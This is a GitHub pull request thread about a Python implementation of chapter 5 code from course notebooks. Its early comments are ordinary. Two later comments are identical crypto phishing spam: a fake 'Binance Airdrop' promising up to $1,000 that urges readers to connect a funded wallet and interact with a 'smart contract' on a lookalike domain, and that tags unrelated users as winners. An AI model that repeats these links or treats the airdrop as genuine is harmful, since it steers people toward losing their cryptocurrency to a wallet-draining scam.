### PR TITLE
Chapter_5.py

### PR DESCRIPTION
**Pull request by chanGimeno**
python implementation of chapter 5 codes.

Run in a normal console:
**>** python Chapter_5.py

or in an ipython console (or ipython notebook):
**In [1]:** %run Chapter_5.py

### CODE REVIEW

**Comment by chanGimeno** [comment]
I used your notebooks for the previous chapters. This is an implementation of the chapter 5 codes in python. Maybe you are interested in.

**Comment by olafSmits** [comment]
Thanks for the implementation. I was a bit late with this week, but I just finished the notebook. I only used your rewrite of the Van Der Pol - demo.

**Comment by a7ortiz** [comment]
Hello Olaf, very good job in Monte Carlo methods in finance. I've just read about python, any introductory text for start? Thanks in advance

**Comment by steveg-gpsaustrack** [comment]
[Binance Airdrop](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @jbalatero, @bluebell136, @TimChen314, @sergiosbx, @adisapphire, @akanoce, @nicole-zz

**Comment by steveg-gpsaustrack** [comment]
[Binance Airdrop](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @MahdiYasini, @mzs0207, @Schreibmaschinespricht, @linhndd, @rozumir, @Herklos, @shing1211

**Pull request closed without merging**
